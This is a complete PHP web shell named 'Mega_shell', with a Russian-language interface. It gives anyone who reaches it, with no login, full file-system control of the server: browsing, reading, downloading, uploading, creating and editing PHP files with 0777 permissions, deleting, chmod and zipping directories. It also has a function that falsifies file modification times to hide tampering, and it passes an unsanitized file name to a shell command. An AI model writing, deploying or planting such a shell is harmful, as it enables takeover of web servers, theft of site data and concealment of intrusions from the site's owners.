<?
Error_reporting(1);
header('Content-type:text/html; charset=utf-8');
// функция изменения времени модификации файла
function changetime($FileName, $Fmtime)
    {
if(@strtotime($Fmtime)=='')
{ return "<br/>Время не корректное!<br/>";} else { $mtime = strtotime($Fmtime); }

if (@exec("touch {$FileName}")) $exec=1;
else
  {
if (@touch ($FileName, $mtime))
{
$msg = "<b>Время последней модификации файла:</b>: ".(date("d.m.Y H:i:s", filemtime($FileName)))."<br/><b>Время последнего доступа к файлу:</b> ".(date("d.m.Y H:i:s", fileatime($FileName)))."<br/><b>Время создания файла:</b>: ".(date("d.m.Y H:i:s", filectime($FileName)));
}
  }
  
  if($exec==1) return "Время изменено из командной строки<br/>";
  elseif($msg) return "Время изменено средствами РНР<br/>$msg";
  else return "Не удалось изменить время последней модификации файла <b>$FileName</b><br/>";
    }
// end
if(empty($_GET['zip']) and empty($_GET['download']) & empty($_GET['img'])){
list($msec,$sec)=explode(chr(32),microtime()); 
$HeadTime=$sec+$msec; 
echo'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Mega_shell</title>
<style type="text/css">
html {
background-image:url(http://keo.su/image/bgv.png);
padding:5px;
background-color: #ffffff;
}

body {
background-image:url(http://keo.su/image/bgv.png);
color:#555;
font-size:13px;
font-family:Arial;
background-color:#f2f2f2;
max-width:900px;
margin:auto;
border:1px #dddddd solid;
border-radius:3px;
box-shadow:0px 0px 5px #b5d3e1;
}

a:link,a:visited {
color:#006699;
text-decoration:none;
}

a:hover {
font-family:Arial;
color:#a2595f;
box-shadow:0px 0px 1px #AAAAAA;
text-decoration:none;
}

a:active {
color: #22505f;
cursor:wait;
text-decoration:none;
}
.mess {
float:center;
width:80%;
border:0;
box-shadow: 4px 5px 3px #666;
color: #777;
background:#eff5fb;
border:1px solid #81bef7;
padding:5px;
margin:3px;text-align:center;
}

.mess:hover {
border:0;
box-shadow: 6px 7px 5px #666;
color: #777;
background:#ffbbbb;
border:1px solid #f19ff7;
cursor:help;
padding:5px;
margin:3px;
text-align:center;
}

.mess:active {
color: #777;
background:#ffabab;
border:1px solid #f19ff7;
cursor:hand;
padding:5px;
margin:3px;
text-align:center;
}

div.border1 {
opacity:0.9;
border-radius:5pt;
padding:1px;
background-color:#e7f1fe;
border-top:3px solid #f2f2f2;
border-bottom:1px solid #AFCDDC;
}
div.border1:hover{
opacity:0.7;
}
#border {
 margin: 5px 3px 5px 3px;
 padding: 10px;
 text-indent: 0px;
 border: 1px solid #999999;
 background-color: #f1efea;
 -moz-transition: background-color 0.8s 0.1s ease;
 -o-transition: background-color 0.8s 0.1s ease;
 -webkit-transition: background-color 0.8s 0.1s ease;
 cursor: pointer;
 box-shadow: 0px 0px 2px #666;
}
#border:hover {
 background-color: #FFF1D7;
 color: #333;
 box-shadow: 0px 0px 4px #666;
}
.log {
float: right;
}
.logi {
float: left;
}
.v {
padding:1px;
margin:1px;
background-color:#b5d3e1;
background-image : url(http://keo.su/image/big/foots.png);
background-repeat : repeat-x;
background-position : 50% top;
height : 20px;
}

a img {
opacity : 0.6;
}

a:hover img {
opacity : 0.9;
}
.logo {
background-image : url(http://keo.su/image/big/fons.png);
background-color:#b5d3e1;
background-repeat : repeat-x;
background-position : 50% top;
height : 20px;
padding : 10px 3px 3px;
}
.area {
color:#6E6E6E;
background:#FCFCFC;
border:1px solid #DBDCBE;
}

textarea {
width:98%;
color:#6E6E6E;
background-color:#FCFCFC;
margin:1px;
padding:2px;
border: 1px solid #DBDCBE;
box-shadow:0px 0px 5px #b5d3e1;
}

input,select,button {
color:#6E6E6E;
background-color:#FBFBFB;
margin:1px;
padding:2px;
border: 1px solid #FBFBFB;
}
input,select,button:hover {
  border:1px solid #aaa;
  border-radius:3px;
  -moz-border-radius:3px;
  -webkit-border-radius:3px;
  transition:border linear .2s,box-shadow linear .2s;
  -moz-transition:border linear .2s,-moz-box-shadow linear .2s;
  -webkit-transition:border linear .2s,-webkit-box-shadow linear .2s;
 box-shadow:0px 0px 5px #b5d3e1;
}
input,button:active {
 box-shadow:0px 0px 5px #FBFBFB;
 border-radius:3px;
}
button {
 margin-bottom: -1px;
 margin-left: 10px;
 margin-top: 2%;
 box-shadow:0px 0px 5px #184A42;
}

.b {
color:#FFFFFF;
text-align:left;
padding:3px;
background-color:#006699;
border-radius:5pt;
}
td {
text-align: center;
color: #006699;
background-color:#eeeeff;
border-radius:3px;
border:1px solid #dedede;
}

th {
border-radius:5pt;
background-color:#cccccc;
}

th:hover {
color: #00705f;
background-color:#eeeeff;
border:1px solid #dedede;
text-decoration:none;
}
</style>
</head><body>';}
/////////////////////////////////
//////////Файл менеджер//////////
/////////////////////////////////
if(empty($_GET['r']) & empty($_GET['input']) & empty($_GET['ren']) & empty($_GET['setchmod']) & empty($_GET['download']) & empty($_GET['up']) & empty($_GET['upload']) & empty($_GET['chmod']) & empty($_GET['rename']) & empty($_GET['rmdir']) & empty($_GET['made']) & empty($_GET['madedir']) & empty($_GET['create']) & empty($_GET['createdir']) & empty($_GET['del']) & empty($_GET['deldir']) & empty($_GET['f']) & empty($_GET['edit']) & empty($_GET['zip'])& empty($_GET['img']) & empty($_GET['touchfile']) & empty($_GET['touch'])){
echo'<div class="logo">Файл менеджер</div>';
if(empty($_GET['d'])){$d="./";}
else{$d=$_GET['d'];}
if($d=="./"){$vverh='.'.$d;}
if($d!=="./"){$vverh=$d.'../';}
$mod=substr(sprintf("%o",fileperms($d.'/'.$file)),-3);
echo'<div class="style"><div class="border1" id="border" >
<span class="area"><a href="?d='.$vverh.'"><img src="http://aux.su/image/up.png" title="Перейти на уровень выше" alt="up"/> </a> '.$d.' (<a href="/?d='.$vverh.'">'.$mod.'</a>)</span></div></div>';
$dir = opendir($d);
while($file = readdir($dir)){
if(is_dir($d.'/'.$file)){
if($file != "." && $file != ".."){
$mod=substr(sprintf("%o",fileperms($d.'/'.$file)),-3);
echo'<br/><img src="http://aux.su/image/dir.gif" alt=""><a href="?d='.$d.$file.'/">'.$file.'</a><div class="log"> '.$mod.' <a href="?zip='.$d.$file.'/"><font color="#0000FF">[Архив]</font></a> <a href="?deldir='.$d.$file.'/"><font color="#FF0000">[Удалить]</font></a> <a href="?ren='.$d.$file.'/"><font color="#000000">[Переименовать]</font></a> <a href="?chmod='.$d.$file.'/"><font color="#FF3300">[Права]</font></a> <a href="?rmdir='.$d.$file.'/"><font color="#00FF00">[Удаление директории]</font></a></div>';}}}
$dir = opendir($d);
while($file = readdir($dir)){
if(is_file($d.'/'.$file)){
$mod=substr(sprintf("%o",fileperms($d.'/'.$file)),-3);
echo' <br/><img src="http://aux.su/image/dgh.gif" alt=""><a href="?r='.$d.$file.'"> '.$file.' </a>'; echo round(filesize("$d/$file")/1024,1); echo'kb <div class="log">'.$mod.' <a href="?f='.$d.$file.'"><font color="#0000FF">[Редактировать]</font></a> <a href="?del='.$d.$file.'"><font color="#FF0000">[Удалить]</font></a> <a href="?ren='.$d.$file.'"><font color="#000000">[Переименовать]</font></a> <a href="?chmod='.$d.$file.'"><font color="#FF3300">[Права]</font></a> <a href="?download='.$d.$file.'"><font color="#00FF00">[Скачать]</font></a></div>';}}
echo'<br /><br />';}
/////////////////////////////////
/////////Переименование//////////
/////////////////////////////////
if(isset($_GET['ren'])){
echo'<div class="logo">Переименование</div>';
echo'<form action="?rename='.$_GET['ren'].'" method="post">
<input name="new_name" value="'.$_GET['ren'].'"><br>
<input type="submit" value="Переименовать!">';}
/////////////////////////////////
////////////Картинки/////////////
/////////////////////////////////
if(isset($_GET['img'])){
$images = array("",
"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
"UpPWG3Ig6Hq/XmRjuZwkAAA7");
header("Content-type: image/gif");
echo base64_decode($images[$img]);}
/////////////////////////////////
/////////Аплоад файлов///////////
/////////////////////////////////
if(isset($_GET['up'])){
echo'<div class="logo">Аплоад файлов</div>';
echo'<form method="post" enctype="multipart/form-data">
<input type="hidden" name="upload" value="'.$_GET['up'].'">
<input type="file" name="file"><br>
Сохранить как:<br><input type="text" name="new_name" value=""><br>
<input type="submit" value="Загрузить"></form>';}
/////////////////////////////////
/////////Аплоад файлов///////////
/////////////////////////////////
if(isset($_POST['upload'])){
$new_name=trim($_POST['new_name']);
if(copy($_FILES["file"]["tmp_name"], $_POST['upload'].$new_name)){
echo '<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Файл успешно загружен</div></center><br/>';}
else{echo '<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Загрузка файла не удалась!</div></center><br/>';}}
/////////////////////////////////
////////////Download/////////////
/////////////////////////////////
if(isset($_GET['download'])){
$file = file_get_contents($_GET['download']);
$name = explode("/",$_GET['download']);
$name = $name[count($name)-1];
header('Content-type: text/plain');
header("Content-disposition: attachment; filename=$name");
echo $file;}
/////////////////////////////////
/////////////Chmods//////////////
/////////////////////////////////
if(isset($_GET['chmod'])){
echo'<div class="logo">Chmods</div>';
$mod=substr(sprintf("%o",fileperms($_GET['chmod'])),-3);
echo'<form action="?setchmod='.$_GET['chmod'].'" method="post">
<input name="chmods" value="'.$mod.'"><br>
<input type="submit" value="Задать chmod!">';}
/////////////////////////////////
/////////////Chmods//////////////
/////////////////////////////////
if(isset($_GET['setchmod'])){
echo'<div class="logo">Chmods</div>';
$chm = chmod($_GET['setchmod'],'0'.$_POST['chmods']);
if($chm){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Chmod '.$_POST['chmods'].' заданы!</div></center><br/>';}
if(!$chm){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка задавания chmod '.$_POST['chmods'].'!</div></center><br/>';}}
/////////////////////////////////
///////Удаление директории///////
/////////////////////////////////
if(isset($_GET['rmdir'])){
echo'<div class="logo">Удаление директории</div>';
$dir = opendir($_GET['rmdir']);
while($dirs = readdir($dir)){
if(is_dir($_GET['rmdir'].$dirs)){
if($dirs != "." && $dirs != ".."){
$poddir = rmdir($_GET['rmdir'].$dirs);}}}
closedir($dir);
$ddir = rmdir($_GET['rmdir']);
if($ddir){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Директория удалена!</div></center><br/>';}
if(!$ddir){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка удаления!</div></center><br/>';}
if($poddir){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Поддиректории удалены!</div></center><br/>';}
if(!$poddir){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка удаления поддиректорий!</div></center><br/>';}}
/////////////////////////////////
////////Переименование///////////
/////////////////////////////////
if(isset($_GET['rename'])){
echo'<div class="logo">Переименование</div>';
$name = rename($_GET['rename'],$new_name);
if($name){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Переименовано!</div></center><br/>';}
if(!$name){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка переименования!</div></center><br/>';}}
/////////////////////////////////
//////////Чтение файла///////////
/////////////////////////////////
if(isset($_GET['r'])){
echo'<div class="logo">Чтение файла</div>';
$file=file($_GET['r']);
if($file){
for($i=0; $i<count($file); $i++){
$file[$i] = htmlspecialchars($file[$i]);
echo '<small>'.$file[$i].'</small><br>';}}
if(!$file){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка чтения файла!</div></center><br/>';}}
/////////////////////////////////
/////////Удаление файла//////////
/////////////////////////////////
if(isset($_GET['del'])){
echo'<div class="logo">Удаление файла</div>';
$delete = unlink($_GET['del']);
if($delete){print '<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Файл <b>'.$_GET['del'].'</b> удален!</div></center><br/>';}
if(!$delete){print '<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка удаления файла <b>'.$_GET['del'].'</b>!</div></center><br/>';}}
/////////////////////////////////
//Удаление файлов из каталогов///
/////////////////////////////////
if(isset($_GET['deldir'])){
echo'<div class="logo">Удаление файлов из каталогов</div>';
$dir = opendir($_GET['deldir']);
while($files = readdir($dir)){
if(is_file($_GET['deldir'].$files)){
$del = unlink($_GET['deldir'].$files);}
if(is_dir($_GET['deldir'].$files) && $files !="." && $files !=".."){
$odir = opendir($_GET['deldir'].$files);
while($reddir = readdir($odir)){
if(is_file($_GET['deldir'].$files.'/'.$reddir)){
$delet = unlink($_GET['deldir'].$files.'/'.$reddir);}}}}
if($del){print '<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Файлы из директории <b>'.$_GET['deldir'].'</b> удалены!</div></center><br/>';}
if(!$del){print '<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка удаления файлов из из директории <b>'.$_GET['deldir'].'</b>!</div></center><br/>';}
if($delet){print'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Файлы из подкаталогов в директории <b>'.$_GET['deldir'].'</b> удалены!</div></center><br/>';}
if(!$delet){print'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка удаления Файлов из подкаталогов в директории <b>'.$_GET['deldir'].'</b>!</div></center><br/>';}}
/////////////////////////////////
//////Редактирование файла///////
/////////////////////////////////
if(isset($_GET['f'])){
echo'<div class="logo">Редактирование файла</div>Содержимое: <br />';
$file = file_get_contents($_GET['f']);
$file = htmlspecialchars($file);
echo'<form action="?edit='.$_GET['f'].'" method="post">
<textarea border="11" class="area" cols="40" rows="15" name="text">'.$file.'</textarea><br>
<input type="submit" value="Редактировать!">';}
/////////////////////////////////
/////////Создание папки//////////
/////////////////////////////////
if(isset($_GET['createdir'])){
echo'<div class="logo">Создание папки</div>';
echo'<form action="?madedir='.$_GET['createdir'].'" method="post">
Название папки: <br />
<input name="new_dirname" value="dirname"><br>
<input type="submit" value="Создать!">';}
/////////////////////////////////
/////////Создание папки//////////
/////////////////////////////////
if(isset($_GET['madedir'])){
echo'<div class="logo">Создание папки</div>';
if(mkdir($_GET['madedir'].$_POST['new_dirname'],0777)){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Папка создана!</div> </center><br />';} else {echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка создания папки!</div> </center><br />';}
}
/////////////////////////////////
/////////Создание файла//////////
/////////////////////////////////
if(isset($_GET['create'])){
echo'<div class="logo">Создание файла</div>';
echo'<form action="?made='.$_GET['create'].'" method="post">
Название файла: <br />
<input name="new_name" value="file.php"><br />
				Содержимое: <br />
<textarea cols="100" rows="15" name="new_file"><?php
?></textarea><br>
<input type="submit" value="Создать!">';}
/////////////////////////////////
/////////Создание файла//////////
/////////////////////////////////
if(isset($_GET['made'])){
echo'<div class="logo">Создание файла</div>';
$fp = fopen($_GET['made'].$_POST['new_name'],"w");
fputs($fp,$_POST['new_file']);                                   
fclose($fp);
chmod($_GET['made'].$_POST['new_name'], 0777);
if($fp){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Файл создан!</div> </center><br />';}
if(!$fp){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка создания файла!</div> </center><br />';}}
/////////////////////////////////
//////Редактирование файла///////
/////////////////////////////////
if(isset($_GET['edit'])){
echo'<div class="logo">Редактирование файла</div>';
$fp = fopen($_GET['edit'],"w");
fputs($fp,$_POST['text']);                                   
fclose($fp);
chmod($_GET['edit'], 0777);
if($fp){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Файл отредактирован!</div> </center><br />';}
if(!$fp){echo'<br /><center> <div class="mess"> <img src="http://keo.su/image/warning.png" alt="" />Ошибка записи файла!</div> </center><br />';}}
/////////////////////////////////
//////////Зипирование////////////
/////////////////////////////////
if(isset($_GET['zip'])){

class zipfile
{

    var $datasec = array(); 
    var $ctrl_dir = array(); 
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; 
    var $old_offset = 0;

    function add_dir($name)

    {
        $name = str_replace("\\", "/", $name);

        $fr = "\x50\x4b\x03\x04";
        $fr .= "\x0a\x00";   
        $fr .= "\x00\x00";   
        $fr .= "\x00\x00";   
        $fr .= "\x00\x00\x00\x00"; 
        $fr .= pack("V",0); 
        $fr .= pack("V",0); 
        $fr .= pack("V",0); 
        $fr .= pack("v", strlen($name) ); 
        $fr .= pack("v", 0 ); 
        $fr .= $name;
        $fr .= pack("V",$crc); 
        $fr .= pack("V",$c_len); 
        $fr .= pack("V",$unc_len); 
        $this -> datasec[] = $fr;
        $new_offset = strlen(implode("", $this->datasec));
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .="\x00\x00";    
        $cdrec .="\x0a\x00";    
        $cdrec .="\x00\x00";    
        $cdrec .="\x00\x00";   
        $cdrec .="\x00\x00\x00\x00"; 
        $cdrec .= pack("V",0); 
        $cdrec .= pack("V",0); 
        $cdrec .= pack("V",0); 
        $cdrec .= pack("v", strlen($name) ); 
        $cdrec .= pack("v", 0 ); 
        $cdrec .= pack("v", 0 ); 
        $cdrec .= pack("v", 0 ); 
        $cdrec .= pack("v", 0 ); 
        $ext = "\x00\x00\x10\x00";
        $ext = "\xff\xff\xff\xff";
        $cdrec .= pack("V", 16 ); 
        $cdrec .= pack("V", $this -> old_offset ); 
        $this -> old_offset = $new_offset;
        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }


    function add_file($data, $name)
    { $name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
        $fr .= "\x14\x00";    
        $fr .= "\x00\x00";    
        $fr .= "\x08\x00";    
        $fr .= "\x00\x00\x00\x00"; 

        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2); 
        $c_len = strlen($zdata);
        $fr .= pack("V",$crc); 
        $fr .= pack("V",$c_len); 
        $fr .= pack("V",$unc_len); 
        $fr .= pack("v", strlen($name) ); 
        $fr .= pack("v", 0 ); 
        $fr .= $name;
        $fr .= $zdata;
        $fr .= pack("V",$crc); 
        $fr .= pack("V",$c_len); 
        $fr .= pack("V",$unc_len); 
        $this -> datasec[] = $fr;
        $new_offset = strlen(implode("", $this->datasec));
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .="\x00\x00";    
        $cdrec .="\x14\x00";  
        $cdrec .="\x00\x00";   
        $cdrec .="\x08\x00";   
        $cdrec .="\x00\x00\x00\x00"; 
        $cdrec .= pack("V",$crc); 
        $cdrec .= pack("V",$c_len); 
        $cdrec .= pack("V",$unc_len);
        $cdrec .= pack("v", strlen($name) ); 
        $cdrec .= pack("v", 0 ); 
        $cdrec .= pack("v", 0 ); 
        $cdrec .= pack("v", 0 ); 
        $cdrec .= pack("v", 0 ); 
        $cdrec .= pack("V", 32 ); 

        $cdrec .= pack("V", $this -> old_offset ); 
        $this -> old_offset = $new_offset;

        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }

    function file() { 
        $data = implode("", $this -> datasec);
        $ctrldir = implode("", $this -> ctrl_dir);
        return
            $data.
            $ctrldir.
            $this -> eof_ctrl_dir.
            pack("v", sizeof($this -> ctrl_dir)).    
            pack("v", sizeof($this -> ctrl_dir)). 
            pack("V", strlen($ctrldir)).   
            pack("V", strlen($data)).    
            "\x00\x00"; }}
$abort = ignore_user_abort(1);
$zipfile = new zipfile();
$fdir = opendir($_GET['zip']);
while($file = readdir($fdir)){
if ($file != '.' and $file != '..'){
if (is_file($_GET['zip'].$file)){$zipfile->add_file(file_get_contents($_GET['zip'].$file),$file);}
if (is_dir($_GET['zip'].$file)){
$sdir = opendir($_GET['zip'].$file);
while($sfile = readdir($sdir)){
if ($sfile != '.' and $sfile != '..'){
if (is_file($_GET['zip'].$file.'/'.$sfile)){$zipfile->add_file(file_get_contents($_GET['zip'].$file.'/'.$sfile), $file.'/'.$sfile);}}}}}}
$name = explode("/",$_GET['zip']);
$file = $name[count($name)-2];
header('Content-type: application/octet-stream');
header("Content-disposition: attachment; filename=$file.zip");
echo $zipfile->file();}
/////////////////////////////////
//////////////Ноги///////////////
/////////////////////////////////
if(empty($_GET['zip']) and empty($_GET['download']) & empty($_GET['img'])){

echo'<div class="style"><div class="border1" id="border" >
<a href="?create='.$d.'">Создать файл здесь</a><br>
<a href="?createdir='.$d.'">Создать папку</a><br>
<a href="?up='.$d.'">Загрузить файл сюда</a><br>
</div></div><div><img src="http://keo.su/image/bf.gif" alt="" /> <a href="?">Файловый менеджер</a></div></div>

		<div class="v"><a href="http://king-top.ru">King-Top.RU &copy; 2016 г.</a></div>';
echo'</body></html>';}
?>